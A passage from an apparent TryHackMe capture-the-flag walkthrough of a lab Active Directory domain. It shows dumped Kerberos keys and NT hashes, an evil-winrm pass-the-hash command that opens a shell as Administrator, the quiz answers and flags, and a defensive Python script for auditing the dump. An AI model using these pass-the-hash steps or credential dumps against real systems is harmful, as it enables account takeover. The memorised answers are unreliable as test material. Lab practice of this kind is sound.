spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:33914ddc95cd7c35af38ca472bfc482cddcd5b33bac475e28e7a80da2ef446d6
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:58d9b0e2915fbed798a5c04913234377
ATTACKTIVEDIREC$:des-cbc-md5:795297bad957d6f4
[*] Cleaning up...
Answer
DRSUAPI
❓Question
What is the Administrator's NTLM hash?
📋 Walkthrough
Each line of the dump has the form domain\user:rid:lmhash:nthash:::. The LM field is aad3b435b51404eeaad3b435b51404ee for every account (the LM hash of an empty string, meaning no LM hashes are stored), and the NTLM hash is the second part of the hash pair, the field right after it. For Administrator that is:
Answer
0e0363213e37b94221497260b0bcb4fc
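As an added example (not part of the original write-up), a small Python audit of secretsdump output: it parses the domain\user:rid:lmhash:nthash::: layout, pulls out the NT hash of a given account, and flags what a defender would act on in such a dump, namely accounts sharing an NT hash (same password, since NT hashes are unsalted) and accounts with a blank password. The sample lines are a subset copied from the dump above; the parsing and the checks are mine.

```python
from collections import defaultdict

# LM hash of the empty string: modern DCs do not store LM hashes, so every
# account shows this value.  NT hash of the empty string: a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Subset of the secretsdump output shown above (raw string: backslashes are literal).
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:c5a191aea415aa6dbe3f9df7e682eb6c:::
[*] Cleaning up...
"""


def parse_secretsdump_line(line):
    """Parse one dump line into a dict, or return None for status lines ([*] ...)
    and anything that does not match [domain\\]user:rid:lmhash:nthash:::."""
    line = line.strip()
    if not line or line.startswith("[*]"):
        return None
    parts = line.split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    principal, rid, lmhash, nthash = parts[0], int(parts[1]), parts[2], parts[3]
    domain, _, user = principal.rpartition("\\")   # domain is "" for builtin lines
    return {"domain": domain, "user": user, "rid": rid,
            "lm": lmhash.lower(), "nt": nthash.lower(),
            "machine": user.endswith("$")}


def parse_dump(text):
    return [e for e in map(parse_secretsdump_line, text.splitlines()) if e]


def nt_hash_of(entries, user):
    """The NT hash for a user: the fourth colon-separated field of its line."""
    for e in entries:
        if e["user"].lower() == user.lower():
            return e["nt"]
    return None


def find_shared_nt_hashes(entries):
    """NT hashes used by more than one account -> the accounts sharing them.
    Equal NT hashes mean equal passwords, so an 'admin twin' account that
    reuses the Administrator password is as sensitive as Administrator."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def find_empty_passwords(entries):
    """Accounts whose NT hash is the hash of the empty string."""
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


def find_lm_stored(entries):
    """Accounts still carrying a real LM hash (should be none on a modern DC)."""
    return [e["user"] for e in entries if e["lm"] != EMPTY_LM]


ENTRIES = parse_dump(SAMPLE_DUMP)

if __name__ == "__main__":
    print("Administrator NT hash:", nt_hash_of(ENTRIES, "Administrator"))
    for h, users in find_shared_nt_hashes(ENTRIES).items():
        print(f"password reuse ({h}): {', '.join(users)}")
    print("blank passwords:", find_empty_passwords(ENTRIES))
    print("LM hashes stored:", find_lm_stored(ENTRIES))
```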
❓Question
What method of attack could allow us to authenticate as the user without the password?
Answer
Pass The Hash
❓Question
``
📋 Walkthrough
Let's check the help of evil-winrm for the option that takes a hash instead of a password:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ evil-winrm
Evil-WinRM shell v3.9
Error: missing argument: ip, user
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-K, --ccache TICKET_FILE Path to Kerberos ticket file (ccache or kirbi format, auto-detected)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-a, --user-agent USERAGENT Specify connection user-agent (default Microsoft WinRM Client)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
Answer
-H
Flag Submission Panel
Submit the flags for each user account. They can be located on each user's desktop.
Let's connect as administrator with evil-winrm using Pass the Hash:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ evil-winrm -u administrator -H 0e0363213e37b94221497260b0bcb4fc -i 10.113.167.216
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
❓Question
svc-admin
Answer
TryHackMe{K3rb3r0s_Pr3_4uth}
❓Question
backup
Answer
TryHackMe{B4ckM3UpSc0tty!}
❓Question
Administrator
Answer
TryHackMe{4ctiveD1rectoryM4st3r}